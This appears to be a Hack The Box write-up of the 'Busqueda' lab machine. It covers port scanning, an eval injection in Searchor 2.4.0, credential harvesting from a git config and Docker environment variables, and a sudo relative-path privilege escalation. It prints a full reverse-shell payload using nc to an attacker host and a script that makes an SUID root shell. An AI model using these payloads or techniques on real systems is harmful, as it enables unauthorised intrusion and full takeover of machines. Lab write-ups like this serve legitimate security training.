[HTB | Easy] Busqueda

Port Scanning

We start with a simple nmap scan:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that we have 2 open ports:

Port 22: simple ssh
Port 80 Apache web server (thats redirect us to searcher.htb)

Web Scanning

Website Enumeration

There is nothing suspicious on the site but "Powered by Flask and Searchor 2.4.0"

Bad Code and Rev Shell

After searching a bit I found these links about a vulnerability on that Open Source project: https://security.snyk.io/vuln/SNYK-PYTHON-SEARCHOR-3166303 https://github.com/ArjunSharda/Searchor/pull/130

The vulnerablility is the bad trusting of user input due the use of the eval function in the search function. We can exploit this pretty straightforward by evading the quotes and injecting our payload (a'), __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <IP> <PORT> >/tmp/f') #) and get a reverse shell (remember to url encode the payload):

Privesc2Root

After a bit enumeration we have found multiple shenanigans running: Vhosts found:

gitea.searcher.htb

Strange open ports:

tcp        127.0.0.1:3000          0.0.0.0:*               LISTEN
tcp        127.0.0.53:53           0.0.0.0:*               LISTEN
tcp        127.0.0.1:45083         0.0.0.0:*               LISTEN
tcp        127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        127.0.0.1:222           0.0.0.0:*               LISTEN

Unexpected in /opt

total 16
drwxr-xr-x  4 root root 4096 Mar  1 10:46 .
drwxr-xr-x 19 root root 4096 Mar  1 10:46 ..
drwx--x--x  4 root root 4096 Dec 21 19:13 containerd
drwxr-xr-x  3 root root 4096 Dec 24 18:23 scripts

We dug a lot and thats the way!

Credentials for Further Access

In the web app directory there is a .git folder with a config file with some credentials (/var/www/app/.git/config):

svc@busqueda:/$ cat /var/www/app/.git/config
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = http://cody:[email protected]/cody/Searcher_site.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
	remote = origin
	merge = refs/heads/main

Nice, these are credentials for both gitea and for our user svc as its the only one on the box cody:jh1usoih2bkjaspwe92.

Trying sudo -l on the user we get that we can execute a file with sudo privilege:

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

This script let us use 3 commands:

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

The first two are docker commands and the last one is a custom script. with docker-inspect we can export data like ENV from the instances viewed with docker-ps: sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' mysql_db | jq

"Env": [
	"USER_UID=115",
	"USER_GID=121",
	"GITEA__database__DB_TYPE=mysql",
	"GITEA__database__HOST=db:3306",
	"GITEA__database__NAME=gitea",
	"GITEA__database__USER=gitea",
	"GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
	"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
	"USER=git", "GITEA_CUSTOM=/data/gitea"
	],

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea | jq

"Env": [
	"MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
	"MYSQL_USER=gitea",
	"MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
	"MYSQL_DATABASE=gitea",
	"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
	"GOSU_VERSION=1.14",
	"MYSQL_MAJOR=8.0",
	"MYSQL_VERSION=8.0.31-1.el8",
	"MYSQL_SHELL_VERSION=8.0.31-1.el8"
	],

After a few tries we found out a winning combo on the gitea vhost: administrator:yuiu1hoiu4i5ho1uh

There was just only a repository called scripts (the one which we can run as root):

Root

The problem in this script consist in the system-checkup.py file where in the function showed below run ./full-checkup.sh, if we go on another directory (like /tmp) and we create a file also called full-checkup.sh the script will run the full-checkup.sh on the directory you are on that moment:

elif action == 'full-checkup':
        try:
            arg_list = ['./full-checkup.sh']
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)

full-checkup.sh POC

#!/bin/bash
cp /bin/bash /tmp/rootbash && chmod +xs /tmp/rootbash

and we run: sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup We can observe that we created a copy of /bin/bash as /tmp/rootbash with the root suid.

We've done it! Now we just need to /tmp/rootbash -p to get root privilege! uid=0(root) gid=0(root) groups=0(root)

That's was a really cool box and thanks for the reading.

Hope to see you soon!

Pedio Zaki

PreviousWriteups Next[HTB | Hard] Pollution

Last updated 1 year ago

Was this helpful?